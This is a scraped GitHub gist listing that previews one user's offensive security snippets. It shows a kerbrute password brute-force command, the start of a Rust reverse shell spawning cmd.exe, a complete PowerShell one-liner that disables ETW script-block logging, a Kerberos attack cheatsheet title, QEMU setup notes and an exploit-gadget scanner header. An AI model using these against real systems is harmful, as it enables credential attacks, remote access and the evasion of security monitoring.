With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
und3ath
/ reverse_shell_windows.rs
Created
June 13, 2022 11:26
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| use std::io::{Read, Write, ErrorKind}; | |
| use std::net::TcpStream; | |
| use std::process::{Command, Stdio}; | |
| use std::thread; | |
| use std::time::{Duration}; | |
| use std::sync::{Arc,Mutex}; | |
| fn main() { | |
| let mut proc = Command::new("cmd.exe") |
und3ath
/ KillETW.ps1
Created
February 7, 2022 13:54
— forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled | |
| # which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt | |
| # to bypass Suspicious ScriptBlock Logging for readability. | |
| # | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |
und3ath
/ kerberos_attacks_cheatsheet.md
Created
October 20, 2020 12:35
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
und3ath
/ ubuntu armhf qemu.txt
Last active
April 4, 2017 15:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| you need to download latest compiled snapshot of QEMU for windows and add the folder path to your PATH env . | |
| you need also osfmount wich used to mount hda image fo extract vmlinuz and initrd after installation . | |
| a least you need a vnc client (qemu kvm console in windows suck ( wrong keymap, dead keyboard alt ctrl touch ) , use the tightvnc-jviewer.jar standlone client ; | |
| the script bellow download the latest ubuntu netinstall bootstrap for armhf , create a 16Go raw disk image and start installation | |
| ##################################" begin install step | |
| @echo off | |
| SET QEMU=C:\Program Files\qemu |
und3ath
/ findjump.cpp
Created
June 27, 2016 09:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Findjmp.c | |
| written by Ryan Permeh - ryan at eeye - Summarily modified by I2S-LaB.com | |
| http://www.eeye.com | |
| Findjmp2.c (pop/pop/ret scanner, logging to file) | |
| version by A.D - class101 at hat-squad | |
| http://class101.org, http://www.hat-squad.com | |